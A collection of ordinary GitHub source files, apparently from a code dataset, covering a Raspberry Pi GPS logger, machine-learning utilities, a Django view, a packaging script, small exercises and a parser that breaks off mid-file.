{"seq_id":"16133935285","text":"#!/usr/bin/python\n\nimport sys\nimport time\nimport difflib\nimport pigpio\nimport pynmea2\nimport os\nimport datetime\nfrom datetime import timedelta\nimport RPi.GPIO as GPIO\n\n# Serial pins for GPS\nRX = 23\nEN = 24\n\n# Pins for GPS button and LED\nGPS_LED = 13\nGPS_Button = 11\n\n# Read data from the GPS\ndef readFromGPS(pi, excess, buffer, bufferIndex, timestampBuffer):\n (dataSize, data) = pi.bb_serial_read(RX)\n if dataSize > 0:\n allStr = excess + str(data)\n excess = ''\n senStartCount = allStr.count('$')\n\n # This section should probably be made more robust:\n # if the data between 2 dollar signs is corrupted/missing it will \n # still be appended to the buffer; if this happens a lot we can waste \n # a lot of time unnecessarily flushing the buffer\n if senStartCount > 1: # contains a whole sentence\n sentStart = allStr.find('$')\n # the next '$' in the full string marks the end of the current sentence\n sentEnd = allStr.find('$', sentStart + 1)\n excess = allStr[sentEnd:]\n sentence = allStr[sentStart:sentEnd]\n buffer.append(sentence)\n bufferIndex += 1\n sysTimestamp = str(datetime.datetime.now().time())[0:11]\n timestampBuffer.append(sysTimestamp)\n elif senStartCount == 1: # discard anything before start of sentence\n sentStart = allStr.find('$')\n excess = allStr[sentStart:]\n\n return (excess, buffer, bufferIndex, timestampBuffer)\n\n# Clear out the buffer\ndef flushBuffer(buffer, bufferIndex, timestampBuffer):\n GPIO.output(GPS_LED, GPIO.LOW)\n tsbi = 0\n for sentence in buffer:\n print(sentence)\n try:\n 
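# pynmea2.parse() turns one raw NMEA sentence (e.g. \"$GPGGA,...\") into a message object and raises an exception on malformed input, which the except clause below absorbs\n 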
msg = pynmea2.parse(sentence)\n try:\n GPSTime = str(msg.timestamp.strftime(\"%H:%M:%S\"))\n except Exception:\n GPSTime = '\\t'\n write = timestampBuffer[tsbi] + \",\\t\" + GPSTime + \",\\t\" + str(msg.latitude) + \",\\t\" + str(msg.longitude) + \",\\t\" + str(msg.altitude) + \"\\n\"\n file.write(write)\n file.flush()\n\n # flash LED to indicate file is saving\n GPIO.output(GPS_LED, GPIO.HIGH)\n time.sleep(0.001)\n GPIO.output(GPS_LED, GPIO.LOW)\n\n except Exception:\n print(\"unable to parse sentence: \" + sentence)\n GPIO.output(GPS_LED, GPIO.LOW)\n # advance the timestamp index even when parsing fails, so timestamps stay aligned with sentences\n tsbi += 1\n \n GPIO.output(GPS_LED, GPIO.LOW)\n return ([], 0, [])\n\n# Initialise the GPS module and prepare for file logging\ndef init(pi, file):\n # Initialize serial emulation library\n pi = pigpio.pi()\n pi.set_mode(RX, pigpio.INPUT)\n pi.set_mode(EN, pigpio.OUTPUT)\n pi.write(EN, True)\n try:\n pi.bb_serial_read_open(RX, 9600, 8)\n except Exception as e:\n pi.stop()\n raise ValueError(e)\n\n # Get a timestamp in order to differentiate from other log files (HH:MM:SS)\n refTime = str(datetime.datetime.now().time())[0:8]\n filename = \"/home/pi/GPS/log_gps_\" + refTime + \".csv\"\n \n # Open file for logging\n file = open(filename, \"a\")\n # Create file if not present\n if os.stat(filename).st_size == 0:\n file.write(\"System_Timestamp,\\tGPS_Timestamp\\tLatitude,\\tLongitude,\\tAltitude\\n\")\n\n GPIO.setmode(GPIO.BOARD) # Numbers GPIOs by physical location\n GPIO.setup(GPS_LED, GPIO.OUT) # Set GPS_LEDPin's mode to output\n GPIO.setup(GPS_Button, GPIO.IN, pull_up_down=GPIO.PUD_UP) # Set GPS_ButtonPin's mode as input\n\n # Flash LED twice when initialisation is complete\n GPIO.output(GPS_LED, 1)\n time.sleep(0.1)\n GPIO.output(GPS_LED, 0)\n time.sleep(0.1)\n GPIO.output(GPS_LED, 1)\n time.sleep(0.1)\n GPIO.output(GPS_LED, 0)\n \n return (pi, file)\n\n# If something fails flash SOS in morse\ndef failstate():\n GPIO.output(GPS_LED, GPIO.HIGH) # GPS LED on\n time.sleep(1)\n print(\"S\")\n GPIO.output(GPS_LED, GPIO.LOW) # GPS LED off\n \n time.sleep(0.3)\n \n GPIO.output(GPS_LED, GPIO.HIGH) # GPS LED on\n time.sleep(0.5)\n print(\"O\")\n GPIO.output(GPS_LED, GPIO.LOW) # GPS LED off\n \n time.sleep(0.3)\n \n GPIO.output(GPS_LED, GPIO.HIGH) # GPS LED on\n time.sleep(1)\n print(\"S\")\n GPIO.output(GPS_LED, GPIO.LOW) # GPS LED off\n\n# clean up GPIO pins\ndef destroy():\n GPIO.output(GPS_LED, GPIO.LOW) # GPS LED off\n GPIO.cleanup() # Release resource\n try:\n pi.stop()\n except Exception:\n print(\"failed to stop pigpio\")\n\n# main logging loop\ndef core(pi, file):\n GPS_Pressed = False\n GPS_Enabled = False\n GPS_Prev = False\n GPS_Curr = False\n\n buffer = [] # buffer for separated sentences (in raw format)\n bufferSize = 60 # buffer size of 60 gives 1 minute of data when sensor is operating at 1 hz\n bufferIndex = 0 # position in buffer\n excess = '' # used for storing incomplete sentences between cycles\n\n timestampBuffer = []\n\n try:\n # main loop\n while True:\n GPS_Prev = GPS_Enabled\n GPS_Curr = not GPIO.input(GPS_Button)\n\n # Toggle logging on and off with pushbutton\n if GPS_Pressed and not GPS_Curr:\n GPS_Pressed = False\n print('GPS Button Released')\n elif not GPS_Pressed and GPS_Curr:\n GPS_Pressed = True\n print('GPS Button Pressed')\n GPS_Enabled = not GPS_Enabled # Toggle GPS logging\n \n if GPS_Enabled:\n # Turn on LED, read data from GPS and flush buffer as required\n GPIO.output(GPS_LED, GPIO.HIGH)\n (excess, buffer, bufferIndex, timestampBuffer) = readFromGPS(pi, excess, buffer, bufferIndex, timestampBuffer)\n if bufferIndex == bufferSize:\n 
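# With the GPS emitting one sentence per second (see the bufferSize comment above), the buffer fills and is flushed to the CSV roughly once per minute\n 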
(buffer, bufferIndex, timestampBuffer) = flushBuffer(buffer, bufferIndex, timestampBuffer)\n # gps has just been disabled, flush the buffer\n elif not GPS_Enabled and GPS_Prev:\n GPIO.output(GPS_LED, GPIO.LOW)\n (buffer, bufferIndex, timestampBuffer) = flushBuffer(buffer, bufferIndex, timestampBuffer)\n else:\n GPIO.output(GPS_LED, GPIO.LOW)\n\n except Exception as e:\n print(e)\n pi.bb_serial_read_close(RX)\n pi.stop()\n destroy()\n failstate()\n\nif __name__ == '__main__': # Program start from here\n try:\n try:\n pi = None\n file = None\n print(\"Initializing\")\n (pi, file) = init(pi, file)\n print(\"initialisation complete\\nEntering core\")\n core(pi, file)\n except Exception as e:\n print(e)\n except KeyboardInterrupt: # When 'Ctrl+C' is pressed, the child program destroy() will be executed\n destroy()","repo_name":"u5561865-drc/yerraloon-2018s2","sub_path":"DataLogger/GPS/GPS.py","file_name":"GPS.py","file_ext":"py","file_size_in_byte":6727,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"30307558657","text":"from Char import char\nfrom Spell import spell\nfrom Cast import cast\n\nimport random\n\nclass game:\n\n player = None\n enemy = None\n\n def __init__(self):\n self.setup()\n\n def setup(self):\n\n # Setup the player character\n #self.player = char(input('Character Name: '))\n self.player = char('Kazagha', 100)\n\n # Select an enemy at random\n self.enemy = self.random_enemy()\n\n def random_enemy(self):\n enemies = ['Ork','Goblin','Giant Spider','Bandit','Hill Giant','Stone Giant','Frost Giant','Fire Giant',\n 'Cloud Giant', 'Storm Giant']\n\n return char(random.choice(enemies), 50)\n\nif __name__ == \"__main__\":\n the_game = game()\n\n with the_game.player as char:\n print(char.name)\n\n #fireball = spell('Fireball', damage=10)\n #icebolt = spell('Icebolt', damage=5)\n\n #print(f'{fireball.damage} vs {icebolt.damage}')\n\n #with cast(fireball) as c:\n # with cast(c, icebolt) as d:\n # print(f'{c.damage} vs. 
{d.damage}')\n # d.cast()\n\n with spell('Fireball', damage=10) as f:\n #print(f.damage)\n f.cast()\n","repo_name":"Kazagha/Python-Prototype","sub_path":"ContextGame/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"18432037109","text":"import json\nimport os\n\nfrom client.file_manager.FileConstants import *\nimport client.CONSTANTS as CONSTANTS\n\n\n##\n# Manages creation and interpretation of .ptorrent files\n#\n# @author Paul Rachwalski\n# @date Apr 3, 2015\n##\nclass MetadataFile(object):\n\n ##\n # Initializes metadata variables\n ##\n def __init__(self):\n self.tracker = None\n self.filename = None\n self.file_id = None\n self.size = 0\n self.piece_size = 0\n\n return\n\n ##\n # Creates a metadata file for the given file\n #\n # @param filename The path to the file\n # @return The path to the metadata file\n ##\n def generate(self, filename, tracker, piece_size=262144):\n if not os.path.isfile(filename):\n return None\n\n self.tracker = tracker\n self.filename = filename.split(\"/\")[-1]\n self.size = os.path.getsize(filename)\n self.piece_size = piece_size\n\n # File ID consists of the filename, size, and piece size separated by dashes\n self.file_id = self.filename + \"-\" + str(self.size) + \"-\" + str(self.piece_size)\n\n metadata = {TRACKER: self.tracker,\n FILE_ID: self.file_id,\n FILE_NAME: self.filename,\n FILE_SIZE: self.size,\n FILE_PIECE_SIZE: self.piece_size}\n json_str = json.dumps(metadata, indent=4)\n\n meta_filename = CONSTANTS.ROOT + CONSTANTS.META_FILES + self.file_id + \".\" + METADATA_EXT\n\n with open(meta_filename, 'w') as meta_file:\n meta_file.write(json_str)\n\n return meta_filename\n\n ##\n # Loads all relavant information from a given metadata file\n #\n # @param metadata_file The path to the metadata file\n # @return The current metadata file object\n ##\n def parse(self, metadata_file):\n good_ext = metadata_file.split(\".\")[-1] == METADATA_EXT\n good_file = os.path.isfile(metadata_file)\n if not good_ext or not good_file:\n return None\n\n with open(metadata_file, 'r') as json_file:\n metadata = json.load(json_file)\n\n self.tracker = metadata[TRACKER]\n self.file_id = metadata[FILE_ID]\n self.filename = metadata[FILE_NAME]\n self.size = metadata[FILE_SIZE]\n self.piece_size = metadata[FILE_PIECE_SIZE]\n\n return self\n\n","repo_name":"rchwlsk2/pTorrent","sub_path":"client/file_manager/MetadataFile.py","file_name":"MetadataFile.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16653048717","text":"import pandas as pd\nfrom pandasql import sqldf, load_births, load_meat\n\nbirths = load_births()\nprint(sqldf('SELECT * FROM births where births > 250000 limit 5;', locals()))\n\n\nq = \"\"\"\n select\n date(date) as DOB, \n sum(births) as \"Total Births\"\n from \n births \n group by \n date\n limit 10;\n \"\"\"\nprint(sqldf(q, locals()))\nprint(sqldf(q, globals()))\n\ndef pysqldf(q):\n return sqldf(q, globals())\nprint(pysqldf(q))\n\ndfcust = pd.read_csv(r\"C:\\Users\\USER\\Desktop\\Lecture1_data\\customers.csv\")\nprint(dfcust.head(3))\nprint(dfcust.dtypes)\nprint(pysqldf(\"\"\"select age as \"Cust.Age\" from dfcust limit 
10;\"\"\"))\n\n\n","repo_name":"Peiting01/For_Python","sub_path":"connect_database/sql-trial.py","file_name":"sql-trial.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"70620259344","text":"from Logic.CRUD import adauga_vanzare\nfrom Tests.testall import run_all_test\nfrom UI.command_line_console import meniu\nfrom UI.console import run_menu\n\n\ndef meniuu():\n print(\"1. First way of running the UI\")\n print(\"2. Second way of running the UI\")\n print(\"3. Exit\")\n\n\ndef main():\n run_all_test()\n #run_m1enu([])\n\n while True:\n meniuu()\n optiune = input(\"Enter an option: \")\n\n if optiune == \"1\":\n lista = []\n lista = adauga_vanzare(\"1\", \"Sange de zapada\", \"politist\", 35, \"gold\", lista)\n lista = adauga_vanzare(\"2\", \"Enigma Otiliei\", \"bildugsroman\", 30, \"none\", lista)\n print(run_menu(lista))\n elif optiune == \"2\":\n lista = []\n lista = adauga_vanzare(\"1\", \"Sange de zapada\", \"politist\", 35, \"gold\", lista)\n lista = adauga_vanzare(\"2\", \"Enigma Otiliei\", \"bildugsroman\", 30, \"none\", lista)\n print(meniu(lista))\n elif optiune == \"3\":\n break\n else:\n print(\"Invalid option! Try again: \")\n\n\n\nmain()\n","repo_name":"AP-MI-2021/lab-567-andreeailies12","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"28240635217","text":"from DeepLearning.CourseTwo.gc_utils import *\n# from DeepLearning.CourseTwo.testCases import *\n\n# Gradient Checking\n\n\n# 1-D gradient checking\ndef forward_propagation(x, theta):\n return theta * x\n\n\ndef backward_propagation(x, theta):\n dtheta = x\n return dtheta\n\n\ndef gradient_check(x, theta, epsilon=1e-7):\n # compute gradapprox\n thetaplus = theta + epsilon\n thetaminus = theta - epsilon\n J_plus = forward_propagation(x, thetaplus)\n J_minus = forward_propagation(x, thetaminus)\n gradapprox = (J_plus - J_minus) / (2 * epsilon)\n\n grad = backward_propagation(x, theta)\n\n numerator = np.linalg.norm(grad - gradapprox)\n denominator = np.linalg.norm(grad) + np.linalg.norm(gradapprox)\n difference = numerator / denominator\n\n if difference < 1e-7:\n print(\"The gradient is correct!\")\n else:\n print(\"The gradient is wrong!\")\n return difference\n\n\n# N-dimensional gradient checking\ndef forward_propagation_n(X, Y, parameters):\n m = X.shape[1]\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n W3 = parameters[\"W3\"]\n b3 = parameters[\"b3\"]\n\n Z1 = np.dot(W1, X) + b1\n A1 = relu(Z1)\n Z2 = np.dot(W2, A1) + b2\n A2 = relu(Z2)\n Z3 = np.dot(W3, A2) + b3\n A3 = sigmoid(Z3)\n\n cost = - 1 / m * (np.dot(Y, np.log(A3).T) + np.dot((1 - Y), np.log(1 - A3).T))\n cache = (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3)\n return cost, cache\n\n\ndef backward_propagation_n(X, Y, cache):\n m = X.shape[1]\n (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache\n\n dZ3 = A3 - Y\n dW3 = 1 / m * np.dot(dZ3, A2.T)\n db3 = 1 / m * np.sum(dZ3, axis=1, keepdims=True)\n\n dA2 = np.dot(W3.T, dZ3)\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1 / m * np.dot(dZ2, A1.T)\n db2 = 1 / m * np.sum(dZ2, axis=1, keepdims=True)\n\n dA1 = np.dot(W2.T, dZ2)\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1 / m * np.dot(dZ1, X.T)\n db1 = 1 / m * np.sum(dZ1, axis=1, keepdims=True)\n\n gradients = {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3,\n \"dA2\": dA2, \"dZ2\": dZ2, 
\"dW2\": dW2, \"db2\": db2,\n \"dA1\": dA1, \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n return gradients\n\n\ndef gradient_check_n(parameters, gradients, X, Y, epsilon=1e-7):\n parameters_values, _ = dictionary_to_vector(parameters)\n grad = gradients_to_vector(gradients)\n num_parameters = parameters_values.shape[0]\n J_plus = np.zeros((num_parameters, 1))\n J_minus = np.zeros((num_parameters, 1))\n gradapprox = np.zeros((num_parameters, 1))\n\n for i in range(num_parameters):\n theta_plus = np.copy(parameters_values)\n theta_plus[i][0] += epsilon\n J_plus[i], _ = forward_propagation_n(X, Y, vector_to_dictionary(theta_plus))\n\n theta_minus = np.copy(parameters_values)\n theta_minus[i][0] -= epsilon\n J_minus[i], _ = forward_propagation_n(X, Y, vector_to_dictionary(theta_minus))\n\n gradapprox[i] = (J_plus[i] - J_minus[i]) / (2 * epsilon)\n\n numerator = np.linalg.norm(grad - gradapprox)\n denominator = np.linalg.norm(grad) + np.linalg.norm(gradapprox)\n difference = numerator / denominator\n\n if difference < 1e-7:\n print(\"The gradient is correct! difference = \" + str(difference))\n else:\n print(\"The gradient is wrong! difference = \" + str(difference))\n return difference\n","repo_name":"TimePickerWang/DeepLearning","sub_path":"CourseTwo-Improving Deep Neural Networks/assignment1_3GradientChecking.py","file_name":"assignment1_3GradientChecking.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"47"} +{"seq_id":"32619732094","text":"from infra.views import PaginatedBaseView\nfrom models.models.model import Model\nfrom helpers.pagination import PaginatedResponse\nfrom helpers.view_helpers import require_jwt\nfrom users.models.user import User\nfrom infra.request.errors import (\n BadRequestError,\n)\n\n\nclass ListUserModelsView(PaginatedBaseView):\n\n @require_jwt\n def validate(self, request, user_id, *args, **kwargs):\n super().validate(request, *args, **kwargs)\n if not User.objects.filter(id=user_id).exists():\n raise BadRequestError('The provided user does not exist.')\n\n def run(self, request, page, user_id, *args, **kwargs):\n filters = {'user_id': user_id}\n if self.user_payload['access_level'] < User.Type.ADMIN_USER_TYPE and self.user_payload['id'] != user_id:\n filters = {'privacy': Model.Privacy.PUBLIC.value}\n query = Model.objects.filter(**filters).order_by('id')\n return PaginatedResponse('models', query, page)\n","repo_name":"LautaroNavarro/3dvortex","sub_path":"src/models/views/model_views/list_user_models.py","file_name":"list_user_models.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"118952958","text":"\"\"\"\nCreated 07-01-21 by Mojtaba Heydari\n\"\"\"\n\n\n# Local imports\n# None.\n\n# Third party imports\n# None.\n\n# Python standard library imports\nimport setuptools\nfrom setuptools import find_packages\nimport distutils.cmd\n\n\n# Required packages\nREQUIRED_PACKAGES = [\n 'numpy',\n 'cython',\n 'librosa>=0.8.0',\n 'numba==0.54.1', # Manually specified here as librosa incorrectly states that it is compatible with the latest version of numba although 0.50.0 is not compatible. 
\n 'scipy',\n 'mido>=1.2.6',\n 'pytest',\n #'pyaudio',\n ##'pyfftw',\n 'madmom',\n 'torch',\n 'Matplotlib',\n]\n\n\nclass MakeReqsCommand(distutils.cmd.Command):\n \"\"\"A custom command to export requirements to a requirements.txt file.\"\"\"\n\n description = 'Export requirements to a requirements.txt file.'\n user_options = []\n\n def initialize_options(self):\n \"\"\"Set default values for options.\"\"\"\n pass\n\n def finalize_options(self):\n \"\"\"Post-process options.\"\"\"\n pass\n\n def run(self):\n \"\"\"Run command.\"\"\"\n with open('./requirements.txt', 'w') as f:\n for req in REQUIRED_PACKAGES:\n f.write(req)\n f.write('\\n')\n\n\nsetuptools.setup(\n cmdclass={\n 'make_reqs': MakeReqsCommand\n },\n\n # Package details\n name=\"BeatNet\",\n version=\"1.1.0\",\n package_dir={\"\": \"src\"},\n packages=find_packages(where=\"src\"),\n # packages=find_packages(),\n include_package_data=True,\n install_requires=REQUIRED_PACKAGES,\n\n # Metadata to display on PyPI\n author=\"Mojtaba Heydari\",\n author_email=\"mhydari@ur.rochester.edu\",\n description=\"A package for online and offline music beat, downbeat tempo and meter tracking using BeatNet AI\",\n keywords=\"Beat tracking, Downbeat tracking, meter detection, tempo tracking, particle filtering, real-time beat, real-time tempo\",\n url=\"https://github.com/mjhydri/BeatNet\"\n\n\n # CLI - not developed yet\n #entry_points = {\n # 'console_scripts': ['beatnet=beatnet.cli:main']\n #}\n)\n","repo_name":"mjhydri/BeatNet","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":236,"dataset":"github-code","pt":"47"} +{"seq_id":"1308021805","text":"import torch\nfrom torch import autograd\nfrom datetime import date\nimport data_loader\n\nSTART_TAG = \"\"\nSTOP_TAG = \"\"\nEMBEDDING_DIM = 100\n\n\ndef convert_to_tags(result):\n tags = []\n tag_to_idx = data_loader.load_tag_to_idx()\n for numT in result[1]:\n tags.extend(key for key, value in tag_to_idx.items() if value == numT)\n return tags\n\n\ndef to_scalar(var):\n # returns a python float\n return var.view(-1).data.tolist()[0]\n\n\ndef argmax(vec):\n # return the argmax as a python int\n _, idx = torch.max(vec, 1)\n return to_scalar(idx)\n\n\ndef prepare_sequence(seq, to_idx):\n word_tensor = []\n for word in seq:\n if word not in to_idx:\n to_idx[word] = len(to_idx)\n word_tensor.append(to_idx[word])\n\n tensor = torch.LongTensor(word_tensor)\n return autograd.Variable(tensor)\n\n\n# Compute log sum exp in a numerically stable way for the forward algorithm\ndef log_sum_exp(vec):\n max_score = vec[0, argmax(vec)]\n max_score_broadcast = max_score.view(1, -1).expand(1, vec.size()[1])\n return max_score + \\\n torch.log(torch.sum(torch.exp(vec - max_score_broadcast)))\n\n\ndef load_checkpoint(filename, model=None):\n print(\"loading model...\")\n checkpoint = torch.load(filename)\n if model:\n model.load_state_dict(checkpoint[\"state_dict\"])\n epoch = checkpoint[\"epoch\"]\n loss = checkpoint[\"loss\"]\n print(\"saved model: epoch = %d, loss = %f\" % (epoch, loss))\n return epoch, checkpoint[\"train\"], checkpoint[\"eval\"]\n\n\ndef save_checkpoint(model, epoch, loss, train_history, eval_histories):\n print(\"saving model...\")\n d = date.today()\n filename = d.strftime(\"%d%m%y\")\n checkpoint = {}\n checkpoint[\"state_dict\"] = model.state_dict()\n checkpoint[\"epoch\"] = epoch\n checkpoint[\"loss\"] = loss\n checkpoint[\"train\"] = train_history\n checkpoint[\"eval\"] = eval_histories\n 
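# Worked example (hypothetical date): saving on 25 June 2018 at epoch 3 gives filename = d.strftime(\"%d%m%y\") = \"250618\", so the checkpoint below lands in \"250618.epoch3\"\n 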
save_file_name = filename + \".epoch%d\" % epoch\n torch.save(checkpoint, save_file_name)\n\n print(\"saved model: epoch = %d, loss = %f\" % (checkpoint[\"epoch\"], checkpoint[\"loss\"]))\n","repo_name":"niros7/NER","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35606363776","text":"from tkinter import *\n\nroot = Tk()\n\nw = Canvas(root, width=200, height=100, background=\"red\")\nw.pack()\n\nw.create_line(0, 50, 200, 50, fill=\"yellow\")\nw.create_line(100, 0, 100, 100, fill=\"blue\", dash=(4, 4))\nw.create_rectangle(50, 25, 150, 75, fill=\"purple\")\n\nmainloop()\n","repo_name":"pirateunclejack/python-tkinter","sub_path":"tk31.py","file_name":"tk31.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22741059339","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**6)\nn = int(input())\ngraph = [list(map(int, input().split())) for _ in range(n)]\ndx = [0, 0, -1, 1]\ndy = [1, -1, 0, 0]\ndp = [[-1]*n for _ in range(n)]\nans = 0\n\ndef dfs(x, y):\n global ans\n if dp[x][y] == -1:\n dp[x][y] = 0\n for i in range(4):\n rx, ry = x + dx[i], y + dy[i]\n if 0 <= rx < n and 0 <= ry < n and graph[rx][ry] > graph[x][y]:\n dp[x][y] = max(dp[x][y], dfs(rx, ry))\n \n return dp[x][y] + 1\n\n\n\n\nfor i in range(n):\n for j in range(n):\n ans = max(dfs(i, j), ans)\n \n\nprint(ans)","repo_name":"LEEHYUNDONG/codingTest","sub_path":"codingTest_python/BOJ/greedyPanda.py","file_name":"greedyPanda.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2114120578","text":"import iconik\nimport responses\n\nfrom common import AUTH_TOKEN_NAME, SHARED_SECRET_NAME\n\nAPP_ID = \"ICONIK_PLUGIN\"\nLL_STORAGE_ID = \"d39b62e1-c586-438a-a82b-70543c228c1b\"\nB2_STORAGE_ID = \"73a746d2-a3ed-4d61-8fd9-aa8f37a27bbb\"\nINVALID_STORAGE_ID = '4e14b12e-ce4c-4920-a2b8-7a8dfa533256'\n\n# Values for secrets\nAUTH_TOKEN = \"SECRET_SQUIRREL\"\nSHARED_SECRET = 'top_secret'\n\nSECRETS = { \n SHARED_SECRET_NAME: SHARED_SECRET,\n AUTH_TOKEN_NAME: AUTH_TOKEN\n}\n\n# Random UUIDs for objects\nJOB_ID = 'eff79bf8-c782-11ec-8e9b-b66ad3c6ae38'\nASSET_ID = '0d56db81-1b8e-4a68-9658-98ad9a94d841'\nORIGINAL_FILE_SET_ID = '0436578d-8418-48b0-89ad-9c719b65137f'\nPPRO_PROXY_FILE_SET_ID = '076ac114-de02-427f-b1aa-7ea6cf1c3835'\nCOLLECTION_ID = '8ae20508-88b0-414e-8b4c-3fa2683e79e0'\nSUBCOLLECTION_ID = 'bf049e70-6749-4e44-a85b-7457236cdf4e'\nMULTI_COLLECTION_ID = '7e6abeea-4bff-4153-912d-2880617046ce'\n\nORIGINAL_FORMAT_NAME = 'ORIGINAL'\nORIGINAL_FORMAT_ID = '0fcfe5f1-eb85-4529-9bd0-3e856b358c81'\nPPRO_PROXY_FORMAT_NAME = 'PPRO_PROXY'\nPPRO_PROXY_FORMAT_ID = 'a45fc28d-0deb-4e14-8c79-1fc11966177c'\n\nFORMATS = {\n ORIGINAL_FORMAT_NAME: ORIGINAL_FORMAT_ID,\n PPRO_PROXY_FORMAT_NAME: PPRO_PROXY_FORMAT_ID\n}\n\nPAYLOAD = {\n \"user_id\": \"256ebe90-c0c8-11ec-9fcd-0648baddf8b3\",\n \"system_domain_id\": \"57016980-6e13-11e8-ab5a-0a580a3c0f5c\",\n \"context\": \"BULK\",\n \"action_id\": \"86f485b2-c71e-11ec-93c4-32f3401f5ebb\",\n \"asset_ids\": [\n ASSET_ID\n ],\n \"collection_ids\": [\n SUBCOLLECTION_ID\n ],\n \"saved_search_ids\": [],\n \"metadata_view_id\": None,\n \"metadata_values\": None,\n \"date_created\": \"2022-04-29T00:22:10.316685\",\n \"auth_token\": AUTH_TOKEN\n}\n\n\ndef 
assert_copy_call_counts(storage_id, format_count):\n # There should be two calls to bulk copy per format - one for the asset and one\n # for the collection\n assert responses.assert_call_count(\n f'{iconik.ICONIK_FILES_API}/storages/{storage_id}/bulk/',\n 2 * format_count\n )\n\n\ndef assert_delete_call_counts():\n # The asset should be deleted and purged twice per format - once directly\n # and once via the subcollection\n assert responses.assert_call_count(\n f'{iconik.ICONIK_FILES_API}/assets/{ASSET_ID}/file_sets/{ORIGINAL_FILE_SET_ID}/',\n 2\n )\n assert responses.assert_call_count(\n f'{iconik.ICONIK_FILES_API}/assets/{ASSET_ID}/file_sets/{ORIGINAL_FILE_SET_ID}/purge/',\n 2\n )\n assert responses.assert_call_count(\n f'{iconik.ICONIK_FILES_API}/assets/{ASSET_ID}/file_sets/{PPRO_PROXY_FILE_SET_ID}/',\n 2\n )\n assert responses.assert_call_count(\n f'{iconik.ICONIK_FILES_API}/assets/{ASSET_ID}/file_sets/{PPRO_PROXY_FILE_SET_ID}/purge/',\n 2\n )\n","repo_name":"backblaze-b2-samples/b2-iconik-plugin","sub_path":"test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22434028263","text":"from calc_oppt_parser import (AstParser, token_func, arith, UNameEnum, Tokenizer)\n\nfrom Ruikowa.ObjectRegex.ASTDef import Ast\nfrom Ruikowa.ErrorHandler import ErrorHandler\nfrom numbers import Real\n\nfrom typing import (Optional, Iterable, Generic, TypeVar, Iterator)\nfrom collections import Iterable as CIterable\nfrom functools import reduce\nfrom toolz import curry\n\nimport operator\n\nT = TypeVar('T')\n\nsrc_code_token_parse = ErrorHandler(arith.match, token_func).from_source_code\n\nop_priorities = {\n \"+\": 1,\n \"-\": 1,\n \"*\": 2,\n \"/\": 2,\n \"//\": 2\n}\nop_func = {\n \"+\": operator.add,\n \"-\": operator.sub,\n \"*\": operator.mul,\n \"/\": operator.truediv,\n \"//\": operator.floordiv\n}\n\n\ndef parse(src: str) -> Ast:\n filename = ''\n return src_code_token_parse(filename, src)\n\n\ndef flatten(seq):\n for each in seq:\n if isinstance(each, CIterable) and not isinstance(each, str):\n yield from flatten(each)\n yield each\n\n\ndef ast_for_decimal(decimal: Ast) -> Real:\n return eval(''.join(map(lambda _: _.string, flatten(decimal))))\n\n\ndef ast_for_arith(arith: Ast) -> Real:\n if len(arith) is 1:\n return ast_for_factor(arith[0])\n return visit_bin_expr(lambda _: ast_for_factor(_) if _.__class__ is Ast else _, DoublyList.from_iter(arith))\n\n\ndef ast_for_factor(factor: Ast) -> Real:\n if len(factor) is 2:\n s, atom = factor\n return -ast_for_atom(atom) if s.string is '-' else ast_for_atom(atom)\n return ast_for_atom(factor[0])\n\n\ndef ast_for_atom(atom: Ast) -> Real:\n if atom[0].name is UNameEnum.decimal:\n return ast_for_decimal(atom[0])\n return ast_for_arith(atom[1])\n\n\nclass DoublyList(Iterable, Generic[T]):\n\n def __init__(self, content: T, prev: 'Optional[DoublyList[T]]' = None, next: 'Optional[DoublyList]' = None):\n self.content: T = content\n self.next = next\n self.prev = prev\n\n def __iter__(self) -> 'Iterator[DoublyList[T]]':\n yield self\n if self.next:\n yield from self.next\n\n def __str__(self):\n return f'[{self.content}{self.next}]'\n\n __repr__ = __str__\n\n @classmethod\n def from_iter(cls, iterable: 'Iterable') -> 'Optional[DoublyList]':\n if not iterable:\n return None\n s_iterable = iter(iterable)\n try:\n fst = cls(next(s_iterable))\n except StopIteration:\n return None\n\n reduce(lambda a, b: setattr(a, 
